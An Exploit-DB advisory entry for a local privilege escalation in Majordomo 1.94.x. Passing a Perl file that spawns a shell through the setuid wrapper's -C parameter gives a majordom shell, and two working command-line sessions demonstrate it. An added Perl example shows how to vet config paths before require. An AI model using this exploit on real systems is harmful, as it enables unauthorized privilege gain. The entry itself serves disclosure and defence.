- 18 Dec 2022
- EDB-ID: 19699
- EDB Verified: Passed
- Author: SHEVEK
- Vulnerability type: LOCAL
- Platform: LINUX
- CVE: cve-2000-0037
- Date published: 1999-12-29
Majordomo 1.94.4/1.94.5 - Local -C Parameter (1)
Code:
source: https://www.securityfocus.com/bid/903/info
A local user can gain majordomo privileges through a vulnerability that allows arbitrary commands to be executed with those privileges. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges.
This occurs in several scripts: archive2.pl, bounce-remind, config-test, digest, majordomo, request-answer and resend. medit under bin/, and archive_mh.pl, new-list, and sequencer under Tools/ use 'require' in the same way, but since the wrapper only executes those scripts found in the majordomo installation directory, they cannot be exploited.
shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom
------
Here's another example (using a different script), posted to Bugtraq by Federico G. Schwindt on May 23, 2000:
$ cat /tmp/myconf
system("/bin/sh");
$ id
uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
$ ./wrapper bounce-remind -C /tmp/myconf
$ id
uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)
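The root cause described above is a 'require' of the file named by -C. As an added example (not Majordomo's own code and not part of the original advisory), here is one way a privileged Perl script could vet a config path before loading it. The helper name config_is_trusted, the policy it enforces, and the temporary directories standing in for the installation directory and a user's home are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added illustration, not Majordomo source. Helper name and policy are assumptions.
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Temp qw(tempdir);

# Pattern the advisory describes: the -C argument goes straight to require,
# so any Perl in that file runs with the wrapper's privileges:
#     require $opt_C;

# Accept a config file only if it resolves inside $trusted_dir, is a regular
# file owned by a trusted uid, and is not writable by group or others.
sub config_is_trusted {
    my ($path, $trusted_dir, @trusted_uids) = @_;
    my $real = abs_path($path);        # resolves symlinks and ".."
    my $base = abs_path($trusted_dir);
    return 0 unless defined $real && defined $base;
    return 0 unless index($real, "$base/") == 0;    # must live under the install dir
    my @st = stat($real) or return 0;
    return 0 unless -f _;                            # regular file only
    return 0 unless grep { $st[4] == $_ } @trusted_uids;
    return 0 if $st[2] & 022;                        # group/other write bit set
    return 1;
}

# Constructed demo: temp dirs stand in for the install dir and a user's home.
my $install = tempdir(CLEANUP => 1);
my $home    = tempdir(CLEANUP => 1);
my %mode = ("$install/majordomo.cf" => 0644,   # expected location, sane mode
            "$install/loose.cf"     => 0666,   # inside, but world-writable
            "$home/foo.pl"          => 0644);  # user-controlled location
for my $file (sort keys %mode) {
    open(my $fh, '>', $file) or die "open $file: $!";
    print {$fh} "1;\n";
    close $fh;
    chmod $mode{$file}, $file;
}
symlink "$home/foo.pl", "$install/link.cf";    # symlink escaping the install dir

for my $cf (sort(keys %mode), "$install/link.cf") {
    printf "%-8s %s\n", (config_is_trusted($cf, $install, $>) ? "accept" : "reject"), $cf;
}
```

The check and the later 'require' are separate operations, so the check only holds if the trusted directory itself cannot be written by unprivileged users.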
- Source: www.exploit-db.com